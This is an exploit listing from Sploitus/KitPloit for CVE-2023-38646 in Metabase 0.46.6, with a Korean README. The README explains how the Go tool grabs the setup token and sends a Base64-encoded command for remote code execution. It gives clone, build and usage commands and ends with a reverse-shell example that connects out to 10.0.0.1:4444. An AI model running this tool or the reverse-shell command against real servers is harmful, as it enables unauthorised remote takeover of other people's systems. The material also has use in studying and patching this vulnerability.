Sploitus

Exploit for CVE-2023-38646

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN47 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DANITHEHACK3R-CVE-2023-38646
# CVE-2023-38646

CVE-2023-38646 Metabase 0.46.6 μ΅μŠ€ν”Œλ‘œμž‡

이 λ„κ΅¬λŠ” μ†Œν”„νŠΈμ›¨μ–΄ ν”Œλž«νΌμ˜ 취약점(CVE-2023-38646)을 μ•…μš©ν•©λ‹ˆλ‹€. 이 μ΅μŠ€ν”Œλ‘œμž‡μ€ 잘λͺ» 처리된 λ°μ΄ν„°λ² μ΄μŠ€ μ—°κ²° λ¬Έμžμ—΄μ„ μ΄μš©ν•˜μ—¬ μ‘°μž‘λœ μš”μ²­μ„ 톡해 원격 μ½”λ“œ 싀행을 κ°€λŠ₯ν•˜κ²Œ ν•©λ‹ˆλ‹€.

## κ°œμš”

이 λ„κ΅¬λŠ”:

  * λŒ€μƒ URLμ—μ„œ μ„€μ • 토큰(setup token)을 κ°€μ Έμ˜΅λ‹ˆλ‹€.
  * 제곡된 λͺ…λ Ήμ–΄λ₯Ό Base64둜 μΈμ½”λ”©ν•©λ‹ˆλ‹€.
  * μΈμ½”λ”©λœ λͺ…λ Ήμ–΄λ‘œ νŽ˜μ΄λ‘œλ“œλ₯Ό κ΅¬μ„±ν•©λ‹ˆλ‹€.
  * νŽ˜μ΄λ‘œλ“œλ₯Ό μ „μ†‘ν•˜μ—¬ 취약점을 μ•…μš©ν•©λ‹ˆλ‹€.



## μ„€μΉ˜

μ €μž₯μ†Œλ₯Ό ν΄λ‘ ν•©λ‹ˆλ‹€:

root@kitploit:~
    
    
    git clone https://github.com/SUT0L/CVE-2023-38646.git
    cd CVE-2023-38646
    go build -o exploit
    chmod +x exploit
    

## μ‚¬μš©λ²•

root@kitploit:~
    
    
    ./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
    

TARGET_URL: μŠ€μΊ” 및 μ•…μš©ν•  ν”Œλž«νΌμ˜ URL. COMMAND: λŒ€μƒμ—μ„œ μ‹€ν–‰ν•  λͺ…λ Ήμ–΄. PROXY_URL (선택 사항): ν”„λ‘μ‹œ μ„œλ²„μ˜ URL (예: http://127.0.0.1:8080). μ œκ³΅ν•˜μ§€ μ•ŠμœΌλ©΄ ν”„λ‘μ‹œκ°€ μ‚¬μš©λ˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€.

## sh λ¦¬λ²„μŠ€ μ…Έ μ˜ˆμ‹œ

root@kitploit:~
    
    
    ./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080